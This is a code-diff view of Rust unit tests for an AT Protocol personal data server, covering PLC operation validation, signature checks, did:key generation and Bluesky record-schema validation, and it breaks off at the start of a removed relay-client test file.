200
+
"alsoKnownAs": ["at://wrong.handle"],
201
+
"services": {
202
+
"atproto_pds": {
203
+
"type": "AtprotoPersonalDataServer",
204
+
"endpoint": "https://pds.example.com"
205
+
}
206
+
},
207
+
"sig": "test"
208
+
});
209
+
210
+
let ctx = PlcValidationContext {
211
+
server_rotation_key: did_key.clone(),
212
+
expected_signing_key: did_key.clone(),
213
+
expected_handle: "test.handle".to_string(),
214
+
expected_pds_endpoint: "https://pds.example.com".to_string(),
215
+
};
216
+
217
+
let result = validate_plc_operation_for_submission(&op, &ctx);
218
+
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("handle")));
219
+
}
220
+
221
+
#[test]
222
+
fn test_validate_pds_service_type() {
223
+
let key = SigningKey::random(&mut rand::thread_rng());
224
+
let did_key = signing_key_to_did_key(&key);
225
+
226
+
let op = json!({
227
+
"type": "plc_operation",
228
+
"rotationKeys": [did_key.clone()],
229
+
"verificationMethods": {"atproto": did_key.clone()},
230
+
"alsoKnownAs": ["at://test.handle"],
231
+
"services": {
232
+
"atproto_pds": {
233
+
"type": "WrongServiceType",
234
+
"endpoint": "https://pds.example.com"
235
+
}
236
+
},
237
+
"sig": "test"
238
+
});
239
+
240
+
let ctx = PlcValidationContext {
241
+
server_rotation_key: did_key.clone(),
242
+
expected_signing_key: did_key.clone(),
243
+
expected_handle: "test.handle".to_string(),
244
+
expected_pds_endpoint: "https://pds.example.com".to_string(),
245
+
};
246
+
247
+
let result = validate_plc_operation_for_submission(&op, &ctx);
248
+
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("type")));
249
+
}
250
+
251
+
#[test]
252
+
fn test_validate_pds_endpoint_match() {
253
+
let key = SigningKey::random(&mut rand::thread_rng());
254
+
let did_key = signing_key_to_did_key(&key);
255
+
256
+
let op = json!({
257
+
"type": "plc_operation",
258
+
"rotationKeys": [did_key.clone()],
259
+
"verificationMethods": {"atproto": did_key.clone()},
260
+
"alsoKnownAs": ["at://test.handle"],
261
+
"services": {
262
+
"atproto_pds": {
263
+
"type": "AtprotoPersonalDataServer",
264
+
"endpoint": "https://wrong.endpoint.com"
265
+
}
266
+
},
267
+
"sig": "test"
268
+
});
269
+
270
+
let ctx = PlcValidationContext {
271
+
server_rotation_key: did_key.clone(),
272
+
expected_signing_key: did_key.clone(),
273
+
expected_handle: "test.handle".to_string(),
274
+
expected_pds_endpoint: "https://pds.example.com".to_string(),
275
+
};
276
+
277
+
let result = validate_plc_operation_for_submission(&op, &ctx);
278
+
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("endpoint")));
279
+
}
280
+
281
+
#[test]
282
+
fn test_verify_signature_secp256k1() {
283
+
let key = SigningKey::random(&mut rand::thread_rng());
284
+
let did_key = signing_key_to_did_key(&key);
285
+
286
+
let op = json!({
287
+
"type": "plc_operation",
288
+
"rotationKeys": [did_key.clone()],
289
+
"verificationMethods": {},
290
+
"alsoKnownAs": [],
291
+
"services": {},
292
+
"prev": null
293
+
});
294
+
295
+
let signed = sign_operation(&op, &key).unwrap();
296
+
let rotation_keys = vec![did_key];
297
+
298
+
let result = verify_operation_signature(&signed, &rotation_keys);
299
+
assert!(result.is_ok());
300
+
assert!(result.unwrap());
301
+
}
302
+
303
+
#[test]
304
+
fn test_verify_signature_wrong_key() {
305
+
let key = SigningKey::random(&mut rand::thread_rng());
306
+
let other_key = SigningKey::random(&mut rand::thread_rng());
307
+
let other_did_key = signing_key_to_did_key(&other_key);
308
+
309
+
let op = json!({
310
+
"type": "plc_operation",
311
+
"rotationKeys": [],
312
+
"verificationMethods": {},
313
+
"alsoKnownAs": [],
314
+
"services": {},
315
+
"prev": null
316
+
});
317
+
318
+
let signed = sign_operation(&op, &key).unwrap();
319
+
let wrong_rotation_keys = vec![other_did_key];
320
+
321
+
let result = verify_operation_signature(&signed, &wrong_rotation_keys);
322
+
assert!(result.is_ok());
323
+
assert!(!result.unwrap());
324
+
}
325
+
326
+
#[test]
327
+
fn test_verify_signature_invalid_did_key_format() {
328
+
let key = SigningKey::random(&mut rand::thread_rng());
329
+
330
+
let op = json!({
331
+
"type": "plc_operation",
332
+
"rotationKeys": [],
333
+
"verificationMethods": {},
334
+
"alsoKnownAs": [],
335
+
"services": {},
336
+
"prev": null
337
+
});
338
+
339
+
let signed = sign_operation(&op, &key).unwrap();
340
+
let invalid_keys = vec!["not-a-did-key".to_string()];
341
+
342
+
let result = verify_operation_signature(&signed, &invalid_keys);
343
+
assert!(result.is_ok());
344
+
assert!(!result.unwrap());
345
+
}
346
+
347
+
#[test]
348
+
fn test_tombstone_validation() {
349
+
let op = json!({
350
+
"type": "plc_tombstone",
351
+
"prev": "bafyreig6xxxxxyyyyyzzzzzz",
352
+
"sig": "test"
353
+
});
354
+
let result = validate_plc_operation(&op);
355
+
assert!(result.is_ok());
356
+
}
357
+
358
+
#[test]
359
+
fn test_cid_for_cbor_deterministic() {
360
+
let value = json!({
361
+
"alpha": 1,
362
+
"beta": 2
363
+
});
364
+
365
+
let cid1 = cid_for_cbor(&value).unwrap();
366
+
let cid2 = cid_for_cbor(&value).unwrap();
367
+
368
+
assert_eq!(cid1, cid2, "CID generation should be deterministic");
369
+
assert!(cid1.starts_with("bafyrei"), "CID should start with bafyrei (dag-cbor + sha256)");
370
+
}
371
+
372
+
#[test]
373
+
fn test_cid_different_for_different_data() {
374
+
let value1 = json!({"data": 1});
375
+
let value2 = json!({"data": 2});
376
+
377
+
let cid1 = cid_for_cbor(&value1).unwrap();
378
+
let cid2 = cid_for_cbor(&value2).unwrap();
379
+
380
+
assert_ne!(cid1, cid2, "Different data should produce different CIDs");
381
+
}
382
+
383
+
#[test]
384
+
fn test_signing_key_to_did_key_format() {
385
+
let key = SigningKey::random(&mut rand::thread_rng());
386
+
let did_key = signing_key_to_did_key(&key);
387
+
388
+
assert!(did_key.starts_with("did:key:z"), "Should start with did:key:z");
389
+
assert!(did_key.len() > 50, "Did key should be reasonably long");
390
+
}
391
+
392
+
#[test]
393
+
fn test_signing_key_to_did_key_unique() {
394
+
let key1 = SigningKey::random(&mut rand::thread_rng());
395
+
let key2 = SigningKey::random(&mut rand::thread_rng());
396
+
397
+
let did1 = signing_key_to_did_key(&key1);
398
+
let did2 = signing_key_to_did_key(&key2);
399
+
400
+
assert_ne!(did1, did2, "Different keys should produce different did:keys");
401
+
}
402
+
403
+
#[test]
404
+
fn test_signing_key_to_did_key_consistent() {
405
+
let key = SigningKey::random(&mut rand::thread_rng());
406
+
407
+
let did1 = signing_key_to_did_key(&key);
408
+
let did2 = signing_key_to_did_key(&key);
409
+
410
+
assert_eq!(did1, did2, "Same key should produce same did:key");
411
+
}
412
+
413
+
#[test]
414
+
fn test_sign_operation_removes_existing_sig() {
415
+
let key = SigningKey::random(&mut rand::thread_rng());
416
+
let op = json!({
417
+
"type": "plc_operation",
418
+
"rotationKeys": [],
419
+
"verificationMethods": {},
420
+
"alsoKnownAs": [],
421
+
"services": {},
422
+
"prev": null,
423
+
"sig": "old_signature"
424
+
});
425
+
426
+
let signed = sign_operation(&op, &key).unwrap();
427
+
let new_sig = signed.get("sig").and_then(|v| v.as_str()).unwrap();
428
+
429
+
assert_ne!(new_sig, "old_signature", "Should replace old signature");
430
+
}
431
+
432
+
#[test]
433
+
fn test_validate_plc_operation_not_object() {
434
+
let result = validate_plc_operation(&json!("not an object"));
435
+
assert!(matches!(result, Err(PlcError::InvalidResponse(_))));
436
+
}
437
+
438
+
#[test]
439
+
fn test_validate_for_submission_tombstone_passes() {
440
+
let key = SigningKey::random(&mut rand::thread_rng());
441
+
let did_key = signing_key_to_did_key(&key);
442
+
443
+
let op = json!({
444
+
"type": "plc_tombstone",
445
+
"prev": "bafyreig6xxxxxyyyyyzzzzzz",
446
+
"sig": "test"
447
+
});
448
+
449
+
let ctx = PlcValidationContext {
450
+
server_rotation_key: did_key.clone(),
451
+
expected_signing_key: did_key,
452
+
expected_handle: "test.handle".to_string(),
453
+
expected_pds_endpoint: "https://pds.example.com".to_string(),
454
+
};
455
+
456
+
let result = validate_plc_operation_for_submission(&op, &ctx);
457
+
assert!(result.is_ok(), "Tombstone should pass submission validation");
458
+
}
459
+
460
+
#[test]
461
+
fn test_verify_signature_missing_sig() {
462
+
let op = json!({
463
+
"type": "plc_operation",
464
+
"rotationKeys": [],
465
+
"verificationMethods": {},
466
+
"alsoKnownAs": [],
467
+
"services": {}
468
+
});
469
+
470
+
let result = verify_operation_signature(&op, &[]);
471
+
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("sig")));
472
+
}
473
+
474
+
#[test]
475
+
fn test_verify_signature_invalid_base64() {
476
+
let op = json!({
477
+
"type": "plc_operation",
478
+
"rotationKeys": [],
479
+
"verificationMethods": {},
480
+
"alsoKnownAs": [],
481
+
"services": {},
482
+
"sig": "not-valid-base64!!!"
483
+
});
484
+
485
+
let result = verify_operation_signature(&op, &[]);
486
+
assert!(matches!(result, Err(PlcError::InvalidResponse(_))));
487
+
}
488
+
489
+
#[test]
490
+
fn test_plc_operation_struct() {
491
+
let mut services = HashMap::new();
492
+
services.insert("atproto_pds".to_string(), PlcService {
493
+
service_type: "AtprotoPersonalDataServer".to_string(),
494
+
endpoint: "https://pds.example.com".to_string(),
495
+
});
496
+
497
+
let mut verification_methods = HashMap::new();
498
+
verification_methods.insert("atproto".to_string(), "did:key:zTest123".to_string());
499
+
500
+
let op = PlcOperation {
501
+
op_type: "plc_operation".to_string(),
502
+
rotation_keys: vec!["did:key:zTest123".to_string()],
503
+
verification_methods,
504
+
also_known_as: vec!["at://test.handle".to_string()],
505
+
services,
506
+
prev: None,
507
+
sig: Some("test".to_string()),
508
+
};
509
+
510
+
let json_value = serde_json::to_value(&op).unwrap();
511
+
assert_eq!(json_value["type"], "plc_operation");
512
+
assert!(json_value["rotationKeys"].is_array());
513
+
}
+590
tests/record_validation.rs
+590
tests/record_validation.rs
···
···
1
+
use bspds::validation::{RecordValidator, ValidationError, ValidationStatus, validate_record_key, validate_collection_nsid};
2
+
use serde_json::json;
3
+
4
+
fn now() -> String {
5
+
chrono::Utc::now().to_rfc3339()
6
+
}
7
+
8
+
#[test]
9
+
fn test_validate_post_valid() {
10
+
let validator = RecordValidator::new();
11
+
let post = json!({
12
+
"$type": "app.bsky.feed.post",
13
+
"text": "Hello world!",
14
+
"createdAt": now()
15
+
});
16
+
let result = validator.validate(&post, "app.bsky.feed.post");
17
+
assert_eq!(result.unwrap(), ValidationStatus::Valid);
18
+
}
19
+
20
+
#[test]
21
+
fn test_validate_post_missing_text() {
22
+
let validator = RecordValidator::new();
23
+
let post = json!({
24
+
"$type": "app.bsky.feed.post",
25
+
"createdAt": now()
26
+
});
27
+
let result = validator.validate(&post, "app.bsky.feed.post");
28
+
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "text"));
29
+
}
30
+
31
+
#[test]
32
+
fn test_validate_post_missing_created_at() {
33
+
let validator = RecordValidator::new();
34
+
let post = json!({
35
+
"$type": "app.bsky.feed.post",
36
+
"text": "Hello"
37
+
});
38
+
let result = validator.validate(&post, "app.bsky.feed.post");
39
+
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "createdAt"));
40
+
}
41
+
42
+
#[test]
43
+
fn test_validate_post_text_too_long() {
44
+
let validator = RecordValidator::new();
45
+
let long_text = "a".repeat(3001);
46
+
let post = json!({
47
+
"$type": "app.bsky.feed.post",
48
+
"text": long_text,
49
+
"createdAt": now()
50
+
});
51
+
let result = validator.validate(&post, "app.bsky.feed.post");
52
+
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "text"));
53
+
}
54
+
55
+
#[test]
56
+
fn test_validate_post_text_at_limit() {
57
+
let validator = RecordValidator::new();
58
+
let limit_text = "a".repeat(3000);
59
+
let post = json!({
60
+
"$type": "app.bsky.feed.post",
61
+
"text": limit_text,
62
+
"createdAt": now()
63
+
});
64
+
let result = validator.validate(&post, "app.bsky.feed.post");
65
+
assert_eq!(result.unwrap(), ValidationStatus::Valid);
66
+
}
67
+
68
+
#[test]
69
+
fn test_validate_post_too_many_langs() {
70
+
let validator = RecordValidator::new();
71
+
let post = json!({
72
+
"$type": "app.bsky.feed.post",
73
+
"text": "Hello",
74
+
"createdAt": now(),
75
+
"langs": ["en", "fr", "de", "es"]
76
+
});
77
+
let result = validator.validate(&post, "app.bsky.feed.post");
78
+
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "langs"));
79
+
}
80
+
81
+
#[test]
82
+
fn test_validate_post_three_langs_ok() {
83
+
let validator = RecordValidator::new();
84
+
let post = json!({
85
+
"$type": "app.bsky.feed.post",
86
+
"text": "Hello",
87
+
"createdAt": now(),
88
+
"langs": ["en", "fr", "de"]
89
+
});
90
+
let result = validator.validate(&post, "app.bsky.feed.post");
91
+
assert_eq!(result.unwrap(), ValidationStatus::Valid);
92
+
}
93
+
94
+
#[test]
95
+
fn test_validate_post_too_many_tags() {
96
+
let validator = RecordValidator::new();
97
+
let post = json!({
98
+
"$type": "app.bsky.feed.post",
99
+
"text": "Hello",
100
+
"createdAt": now(),
101
+
"tags": ["tag1", "tag2", "tag3", "tag4", "tag5", "tag6", "tag7", "tag8", "tag9"]
102
+
});
103
+
let result = validator.validate(&post, "app.bsky.feed.post");
104
+
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "tags"));
105
+
}
106
+
107
+
#[test]
108
+
fn test_validate_post_eight_tags_ok() {
109
+
let validator = RecordValidator::new();
110
+
let post = json!({
111
+
"$type": "app.bsky.feed.post",
112
+
"text": "Hello",
113
+
"createdAt": now(),
114
+
"tags": ["tag1", "tag2", "tag3", "tag4", "tag5", "tag6", "tag7", "tag8"]
115
+
});
116
+
let result = validator.validate(&post, "app.bsky.feed.post");
117
+
assert_eq!(result.unwrap(), ValidationStatus::Valid);
118
+
}
119
+
120
+
#[test]
121
+
fn test_validate_post_tag_too_long() {
122
+
let validator = RecordValidator::new();
123
+
let long_tag = "t".repeat(641);
124
+
let post = json!({
125
+
"$type": "app.bsky.feed.post",
126
+
"text": "Hello",
127
+
"createdAt": now(),
128
+
"tags": [long_tag]
129
+
});
130
+
let result = validator.validate(&post, "app.bsky.feed.post");
131
+
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.starts_with("tags/")));
132
+
}
133
+
134
+
#[test]
135
+
fn test_validate_profile_valid() {
136
+
let validator = RecordValidator::new();
137
+
let profile = json!({
138
+
"$type": "app.bsky.actor.profile",
139
+
"displayName": "Test User",
140
+
"description": "A test user profile"
141
+
});
142
+
let result = validator.validate(&profile, "app.bsky.actor.profile");
143
+
assert_eq!(result.unwrap(), ValidationStatus::Valid);
144
+
}
145
+
146
+
#[test]
147
+
fn test_validate_profile_empty_ok() {
148
+
let validator = RecordValidator::new();
149
+
let profile = json!({
150
+
"$type": "app.bsky.actor.profile"
151
+
});
152
+
let result = validator.validate(&profile, "app.bsky.actor.profile");
153
+
assert_eq!(result.unwrap(), ValidationStatus::Valid);
154
+
}
155
+
156
+
#[test]
157
+
fn test_validate_profile_displayname_too_long() {
158
+
let validator = RecordValidator::new();
159
+
let long_name = "n".repeat(641);
160
+
let profile = json!({
161
+
"$type": "app.bsky.actor.profile",
162
+
"displayName": long_name
163
+
});
164
+
let result = validator.validate(&profile, "app.bsky.actor.profile");
165
+
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName"));
166
+
}
167
+
168
+
#[test]
169
+
fn test_validate_profile_description_too_long() {
170
+
let validator = RecordValidator::new();
171
+
let long_desc = "d".repeat(2561);
172
+
let profile = json!({
173
+
"$type": "app.bsky.actor.profile",
174
+
"description": long_desc
175
+
});
176
+
let result = validator.validate(&profile, "app.bsky.actor.profile");
177
+
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "description"));
178
+
}
179
+
180
+
#[test]
181
+
fn test_validate_like_valid() {
182
+
let validator = RecordValidator::new();
183
+
let like = json!({
184
+
"$type": "app.bsky.feed.like",
185
+
"subject": {
186
+
"uri": "at://did:plc:test/app.bsky.feed.post/123",
187
+
"cid": "bafyreig6xxxxxyyyyyzzzzzz"
188
+
},
189
+
"createdAt": now()
190
+
});
191
+
let result = validator.validate(&like, "app.bsky.feed.like");
192
+
assert_eq!(result.unwrap(), ValidationStatus::Valid);
193
+
}
194
+
195
+
#[test]
196
+
fn test_validate_like_missing_subject() {
197
+
let validator = RecordValidator::new();
198
+
let like = json!({
199
+
"$type": "app.bsky.feed.like",
200
+
"createdAt": now()
201
+
});
202
+
let result = validator.validate(&like, "app.bsky.feed.like");
203
+
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
204
+
}
205
+
206
+
#[test]
207
+
fn test_validate_like_missing_subject_uri() {
208
+
let validator = RecordValidator::new();
209
+
let like = json!({
210
+
"$type": "app.bsky.feed.like",
211
+
"subject": {
212
+
"cid": "bafyreig6xxxxxyyyyyzzzzzz"
213
+
},
214
+
"createdAt": now()
215
+
});
216
+
let result = validator.validate(&like, "app.bsky.feed.like");
217
+
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f.contains("uri")));
218
+
}
219
+
220
+
#[test]
221
+
fn test_validate_like_invalid_subject_uri() {
222
+
let validator = RecordValidator::new();
223
+
let like = json!({
224
+
"$type": "app.bsky.feed.like",
225
+
"subject": {
226
+
"uri": "https://example.com/not-at-uri",
227
+
"cid": "bafyreig6xxxxxyyyyyzzzzzz"
228
+
},
229
+
"createdAt": now()
230
+
});
231
+
let result = validator.validate(&like, "app.bsky.feed.like");
232
+
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.contains("uri")));
233
+
}
234
+
235
+
#[test]
236
+
fn test_validate_repost_valid() {
237
+
let validator = RecordValidator::new();
238
+
let repost = json!({
239
+
"$type": "app.bsky.feed.repost",
240
+
"subject": {
241
+
"uri": "at://did:plc:test/app.bsky.feed.post/123",
242
+
"cid": "bafyreig6xxxxxyyyyyzzzzzz"
243
+
},
244
+
"createdAt": now()
245
+
});
246
+
let result = validator.validate(&repost, "app.bsky.feed.repost");
247
+
assert_eq!(result.unwrap(), ValidationStatus::Valid);
248
+
}
249
+
250
+
#[test]
251
+
fn test_validate_repost_missing_subject() {
252
+
let validator = RecordValidator::new();
253
+
let repost = json!({
254
+
"$type": "app.bsky.feed.repost",
255
+
"createdAt": now()
256
+
});
257
+
let result = validator.validate(&repost, "app.bsky.feed.repost");
258
+
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
259
+
}
260
+
261
+
#[test]
262
+
fn test_validate_follow_valid() {
263
+
let validator = RecordValidator::new();
264
+
let follow = json!({
265
+
"$type": "app.bsky.graph.follow",
266
+
"subject": "did:plc:test12345",
267
+
"createdAt": now()
268
+
});
269
+
let result = validator.validate(&follow, "app.bsky.graph.follow");
270
+
assert_eq!(result.unwrap(), ValidationStatus::Valid);
271
+
}
272
+
273
+
#[test]
274
+
fn test_validate_follow_missing_subject() {
275
+
let validator = RecordValidator::new();
276
+
let follow = json!({
277
+
"$type": "app.bsky.graph.follow",
278
+
"createdAt": now()
279
+
});
280
+
let result = validator.validate(&follow, "app.bsky.graph.follow");
281
+
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
282
+
}
283
+
284
+
#[test]
285
+
fn test_validate_follow_invalid_subject() {
286
+
let validator = RecordValidator::new();
287
+
let follow = json!({
288
+
"$type": "app.bsky.graph.follow",
289
+
"subject": "not-a-did",
290
+
"createdAt": now()
291
+
});
292
+
let result = validator.validate(&follow, "app.bsky.graph.follow");
293
+
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
294
+
}
295
+
296
+
#[test]
297
+
fn test_validate_block_valid() {
298
+
let validator = RecordValidator::new();
299
+
let block = json!({
300
+
"$type": "app.bsky.graph.block",
301
+
"subject": "did:plc:blocked123",
302
+
"createdAt": now()
303
+
});
304
+
let result = validator.validate(&block, "app.bsky.graph.block");
305
+
assert_eq!(result.unwrap(), ValidationStatus::Valid);
306
+
}
307
+
308
+
#[test]
309
+
fn test_validate_block_invalid_subject() {
310
+
let validator = RecordValidator::new();
311
+
let block = json!({
312
+
"$type": "app.bsky.graph.block",
313
+
"subject": "not-a-did",
314
+
"createdAt": now()
315
+
});
316
+
let result = validator.validate(&block, "app.bsky.graph.block");
317
+
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
318
+
}
319
+
320
+
#[test]
321
+
fn test_validate_list_valid() {
322
+
let validator = RecordValidator::new();
323
+
let list = json!({
324
+
"$type": "app.bsky.graph.list",
325
+
"name": "My List",
326
+
"purpose": "app.bsky.graph.defs#modlist",
327
+
"createdAt": now()
328
+
});
329
+
let result = validator.validate(&list, "app.bsky.graph.list");
330
+
assert_eq!(result.unwrap(), ValidationStatus::Valid);
331
+
}
332
+
333
+
#[test]
334
+
fn test_validate_list_name_too_long() {
335
+
let validator = RecordValidator::new();
336
+
let long_name = "n".repeat(65);
337
+
let list = json!({
338
+
"$type": "app.bsky.graph.list",
339
+
"name": long_name,
340
+
"purpose": "app.bsky.graph.defs#modlist",
341
+
"createdAt": now()
342
+
});
343
+
let result = validator.validate(&list, "app.bsky.graph.list");
344
+
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name"));
345
+
}
346
+
347
+
#[test]
348
+
fn test_validate_list_empty_name() {
349
+
let validator = RecordValidator::new();
350
+
let list = json!({
351
+
"$type": "app.bsky.graph.list",
352
+
"name": "",
353
+
"purpose": "app.bsky.graph.defs#modlist",
354
+
"createdAt": now()
355
+
});
356
+
let result = validator.validate(&list, "app.bsky.graph.list");
357
+
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name"));
358
+
}
359
+
360
+
#[test]
361
+
fn test_validate_feed_generator_valid() {
362
+
let validator = RecordValidator::new();
363
+
let generator = json!({
364
+
"$type": "app.bsky.feed.generator",
365
+
"did": "did:web:example.com",
366
+
"displayName": "My Feed",
367
+
"createdAt": now()
368
+
});
369
+
let result = validator.validate(&generator, "app.bsky.feed.generator");
370
+
assert_eq!(result.unwrap(), ValidationStatus::Valid);
371
+
}
372
+
373
+
#[test]
374
+
fn test_validate_feed_generator_displayname_too_long() {
375
+
let validator = RecordValidator::new();
376
+
let long_name = "f".repeat(241);
377
+
let generator = json!({
378
+
"$type": "app.bsky.feed.generator",
379
+
"did": "did:web:example.com",
380
+
"displayName": long_name,
381
+
"createdAt": now()
382
+
});
383
+
let result = validator.validate(&generator, "app.bsky.feed.generator");
384
+
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName"));
385
+
}
386
+
387
+
#[test]
388
+
fn test_validate_unknown_type_returns_unknown() {
389
+
let validator = RecordValidator::new();
390
+
let custom = json!({
391
+
"$type": "com.custom.record",
392
+
"data": "test"
393
+
});
394
+
let result = validator.validate(&custom, "com.custom.record");
395
+
assert_eq!(result.unwrap(), ValidationStatus::Unknown);
396
+
}
397
+
398
+
#[test]
399
+
fn test_validate_unknown_type_strict_rejects() {
400
+
let validator = RecordValidator::new().require_lexicon(true);
401
+
let custom = json!({
402
+
"$type": "com.custom.record",
403
+
"data": "test"
404
+
});
405
+
let result = validator.validate(&custom, "com.custom.record");
406
+
assert!(matches!(result, Err(ValidationError::UnknownType(_))));
407
+
}
408
+
409
+
#[test]
410
+
fn test_validate_type_mismatch() {
411
+
let validator = RecordValidator::new();
412
+
let record = json!({
413
+
"$type": "app.bsky.feed.like",
414
+
"subject": {"uri": "at://test", "cid": "bafytest"},
415
+
"createdAt": now()
416
+
});
417
+
let result = validator.validate(&record, "app.bsky.feed.post");
418
+
assert!(matches!(result, Err(ValidationError::TypeMismatch { expected, actual })
419
+
if expected == "app.bsky.feed.post" && actual == "app.bsky.feed.like"));
420
+
}
421
+
422
+
#[test]
423
+
fn test_validate_missing_type() {
424
+
let validator = RecordValidator::new();
425
+
let record = json!({
426
+
"text": "Hello"
427
+
});
428
+
let result = validator.validate(&record, "app.bsky.feed.post");
429
+
assert!(matches!(result, Err(ValidationError::MissingType)));
430
+
}
431
+
432
+
#[test]
433
+
fn test_validate_not_object() {
434
+
let validator = RecordValidator::new();
435
+
let record = json!("just a string");
436
+
let result = validator.validate(&record, "app.bsky.feed.post");
437
+
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
438
+
}
439
+
440
+
#[test]
441
+
fn test_validate_datetime_format_valid() {
442
+
let validator = RecordValidator::new();
443
+
let post = json!({
444
+
"$type": "app.bsky.feed.post",
445
+
"text": "Test",
446
+
"createdAt": "2024-01-15T10:30:00.000Z"
447
+
});
448
+
let result = validator.validate(&post, "app.bsky.feed.post");
449
+
assert_eq!(result.unwrap(), ValidationStatus::Valid);
450
+
}
451
+
452
+
#[test]
453
+
fn test_validate_datetime_with_offset() {
454
+
let validator = RecordValidator::new();
455
+
let post = json!({
456
+
"$type": "app.bsky.feed.post",
457
+
"text": "Test",
458
+
"createdAt": "2024-01-15T10:30:00+05:30"
459
+
});
460
+
let result = validator.validate(&post, "app.bsky.feed.post");
461
+
assert_eq!(result.unwrap(), ValidationStatus::Valid);
462
+
}
463
+
464
+
#[test]
465
+
fn test_validate_datetime_invalid_format() {
466
+
let validator = RecordValidator::new();
467
+
let post = json!({
468
+
"$type": "app.bsky.feed.post",
469
+
"text": "Test",
470
+
"createdAt": "2024/01/15"
471
+
});
472
+
let result = validator.validate(&post, "app.bsky.feed.post");
473
+
assert!(matches!(result, Err(ValidationError::InvalidDatetime { .. })));
474
+
}
475
+
476
+
#[test]
477
+
fn test_validate_record_key_valid() {
478
+
assert!(validate_record_key("3k2n5j2").is_ok());
479
+
assert!(validate_record_key("valid-key").is_ok());
480
+
assert!(validate_record_key("valid_key").is_ok());
481
+
assert!(validate_record_key("valid.key").is_ok());
482
+
assert!(validate_record_key("valid~key").is_ok());
483
+
assert!(validate_record_key("self").is_ok());
484
+
}
485
+
486
+
#[test]
487
+
fn test_validate_record_key_empty() {
488
+
let result = validate_record_key("");
489
+
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
490
+
}
491
+
492
+
#[test]
493
+
fn test_validate_record_key_dot() {
494
+
assert!(validate_record_key(".").is_err());
495
+
assert!(validate_record_key("..").is_err());
496
+
}
497
+
498
+
#[test]
499
+
fn test_validate_record_key_invalid_chars() {
500
+
assert!(validate_record_key("invalid/key").is_err());
501
+
assert!(validate_record_key("invalid key").is_err());
502
+
assert!(validate_record_key("invalid@key").is_err());
503
+
assert!(validate_record_key("invalid#key").is_err());
504
+
}
505
+
506
+
#[test]
507
+
fn test_validate_record_key_too_long() {
508
+
let long_key = "k".repeat(513);
509
+
let result = validate_record_key(&long_key);
510
+
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
511
+
}
512
+
513
+
#[test]
514
+
fn test_validate_record_key_at_max_length() {
515
+
let max_key = "k".repeat(512);
516
+
assert!(validate_record_key(&max_key).is_ok());
517
+
}
518
+
519
+
#[test]
520
+
fn test_validate_collection_nsid_valid() {
521
+
assert!(validate_collection_nsid("app.bsky.feed.post").is_ok());
522
+
assert!(validate_collection_nsid("com.atproto.repo.record").is_ok());
523
+
assert!(validate_collection_nsid("a.b.c").is_ok());
524
+
assert!(validate_collection_nsid("my-app.domain.record-type").is_ok());
525
+
}
526
+
527
+
#[test]
528
+
fn test_validate_collection_nsid_empty() {
529
+
let result = validate_collection_nsid("");
530
+
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
531
+
}
532
+
533
+
#[test]
534
+
fn test_validate_collection_nsid_too_few_segments() {
535
+
assert!(validate_collection_nsid("a").is_err());
536
+
assert!(validate_collection_nsid("a.b").is_err());
537
+
}
538
+
539
+
#[test]
540
+
fn test_validate_collection_nsid_empty_segment() {
541
+
assert!(validate_collection_nsid("a..b.c").is_err());
542
+
assert!(validate_collection_nsid(".a.b.c").is_err());
543
+
assert!(validate_collection_nsid("a.b.c.").is_err());
544
+
}
545
+
546
+
#[test]
547
+
fn test_validate_collection_nsid_invalid_chars() {
548
+
assert!(validate_collection_nsid("a.b.c/d").is_err());
549
+
assert!(validate_collection_nsid("a.b.c_d").is_err());
550
+
assert!(validate_collection_nsid("a.b.c@d").is_err());
551
+
}
552
+
553
+
#[test]
554
+
fn test_validate_threadgate() {
555
+
let validator = RecordValidator::new();
556
+
let gate = json!({
557
+
"$type": "app.bsky.feed.threadgate",
558
+
"post": "at://did:plc:test/app.bsky.feed.post/123",
559
+
"createdAt": now()
560
+
});
561
+
let result = validator.validate(&gate, "app.bsky.feed.threadgate");
562
+
assert_eq!(result.unwrap(), ValidationStatus::Valid);
563
+
}
564
+
565
+
#[test]
566
+
fn test_validate_labeler_service() {
567
+
let validator = RecordValidator::new();
568
+
let labeler = json!({
569
+
"$type": "app.bsky.labeler.service",
570
+
"policies": {
571
+
"labelValues": ["spam", "nsfw"]
572
+
},
573
+
"createdAt": now()
574
+
});
575
+
let result = validator.validate(&labeler, "app.bsky.labeler.service");
576
+
assert_eq!(result.unwrap(), ValidationStatus::Valid);
577
+
}
578
+
579
+
#[test]
580
+
fn test_validate_list_item() {
581
+
let validator = RecordValidator::new();
582
+
let item = json!({
583
+
"$type": "app.bsky.graph.listitem",
584
+
"subject": "did:plc:test123",
585
+
"list": "at://did:plc:owner/app.bsky.graph.list/mylist",
586
+
"createdAt": now()
587
+
});
588
+
let result = validator.validate(&item, "app.bsky.graph.listitem");
589
+
assert_eq!(result.unwrap(), ValidationStatus::Valid);
590
+
}
-86
tests/relay_client.rs
-86
tests/relay_client.rs
···
1
-
mod common;
2
-
use common::*;
3
-
4
-
use axum::{extract::ws::Message, routing::get, Router};
5
-
use bspds::{
6
-
